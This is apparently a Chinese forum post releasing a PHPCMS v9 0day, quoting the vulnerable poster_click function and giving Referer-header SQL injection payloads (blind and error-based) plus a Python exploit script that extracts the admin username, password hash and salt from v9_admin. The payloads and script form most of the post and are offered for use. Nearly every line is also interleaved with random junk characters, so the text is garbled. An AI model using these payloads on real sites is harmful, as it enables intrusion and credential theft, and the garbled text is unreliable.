有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
9 W5 t6 w' k/ y2 {0 f2 g/ L( g* C
, k8 f" L- S3 M问题函数\phpcms\modules\poster\index.php
* B+ M; G d+ Z4 g( ?7 \6 U+ H* k6 {9 g9 B( N, H# a
public function poster_click() {. ]. x K8 }4 c% L( y8 o4 d
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
& o' ~! p7 X0 s$r = $this->db->get_one(array('id'=>$id));8 t- U# F( M4 o( ^, ~% S; H' V% o
if (!is_array($r) && empty($r)) return false;
. S9 t/ Q$ f5 P. J4 m- X* K$ip_area = pc_base::load_sys_class('ip_area');
S( `" u) C1 I1 q9 v: m1 u9 c$ip = ip();* G5 }7 A" ]8 F0 Y
$area = $ip_area->get($ip);. u- M B. v9 J S5 H
$username = param::get_cookie('username') ? param::get_cookie('username') : '';9 x4 S& {; j/ \$ ^3 }9 M- P7 x$ s
if($id) {& o& S+ z8 y! t5 A+ W1 t5 k
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();9 N0 y, u1 w" V$ r! s# z I3 B4 M
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) n3 h7 M6 z4 \% S0 o}
1 @) w* }9 E# {7 |3 |$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));/ n% Y6 F9 d- u3 B( g
$setting = string2array($r['setting']);
* @8 C! ?" K+ d$ `/ [ _if (count($setting)==1) {' t/ Y7 R6 }' F" q8 L* g, p9 k
$url = $setting['1']['linkurl'];
, G; ~& ?) Z/ J9 M} else {$ I3 `9 T7 P. J# e% y
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
9 Z% p+ q( N7 @}. Q! M5 {( n( ~ H, z& i
header('Location: '.$url);
& k" ?$ g/ d1 }0 o}1 R0 h+ ^4 `$ d6 I
) Z5 e+ R! p' i) `$ C
9 q( a4 U) U5 V! ^) o9 P4 y
! O& J( z/ H$ K, g. Q! B+ {2 d利用方式:" `9 |( i: U f. u3 G
! g/ I$ k+ p1 _; b( }/ I
1、可以采用盲注入的手法:
# l' N& Z) ]7 G, _7 [* i
! v8 s# B( N& y+ b9 H4 }, mreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
% D- @0 p c' }6 P
" j# k' }8 |4 |' d" Y7 |通过返回页面,正常与否一个个猜解密码字段。' H# x# ^- g4 @4 M3 Y- P
2 V9 [ \3 w. _# c3 d
2、代码是花开写的,随手附上了:) |7 q$ g2 U3 I: K6 ^3 R) b4 O
1 A/ P3 p4 |; i2 k% C2 y* {+ D1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
" k4 M0 d2 v/ e7 J
9 S6 c; x. _ d9 s6 ]; g+ n1 P此方法是爆错注入手法,原理自查。: i' M9 |, j! E2 T L
T/ \4 m0 h) \. [. }4 u6 J 0 w* [7 w& z$ F8 O
: z' c: Q# u( e# k5 Y* ~8 K' ]* i利用程序:+ Q. C& Z) s: {. D) c% n
V% K z1 T& I c
#!/usr/bin/env python; ?' q# W) |1 I' M! k! Y! R
import httplib,sys,re
! n# q+ K+ z2 b: D$ B; v
0 U/ O. ^7 S% v* pdef attack():
" x7 X% K9 n% Eprint “Code by Pax.Mac Team conqu3r!”2 d' r, N# {4 A! a6 i
print “Welcome to our zone!!!”- C2 M( D7 p5 F: j
url=sys.argv[1]
% S: G: g4 [& P0 J! h! @paths=sys.argv[2]8 v% r7 V0 k, ]* ^* S( x) @3 k, r4 `
conn = httplib.HTTPConnection(url)
1 n N; Z+ i) B! | ^i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
) R/ [8 Q$ z5 d* o# k“Accept”: “text/plain”,* v8 O O" ^2 S2 G. v' Y$ H; o* l7 M
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
7 q9 Q, j2 P- h8 C% iconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)& U$ M$ ^- A! G4 t
r1 = conn.getresponse()' B, \, T1 H6 `( D
datas=r1.read()
/ ~- q, x8 r5 a! F udatas=re.findall(r”Duplicate entry \’\w+’”, datas)1 `% F: ^0 z2 N" Y6 d1 T
print datas[0]
' Q$ y1 s# v& g3 J" X" Fconn.close()5 I* a! O# w w
if __name__==”__main__”:
9 I2 J8 q5 Q4 Rif len(sys.argv)<3:4 l/ s7 F( }+ W4 f; Q
print “Code by Pax.Mac Team conqu3r”
+ G* Q5 M( A' y- V5 B- }" yprint “Usgae:”
: i1 T* ~+ w9 O1 yprint “ phpcmsattack.py www.paxmac.org /”
' r# C" U. W }" a* g" K7 Zprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
; {* h# n/ Z1 c6 d+ D, |8 Csys.exit(1)
3 M7 [* g* r* r L, J6 h% cattack()
% Y8 _0 [; ?* q% M
1 [& Q0 c; [( [# z |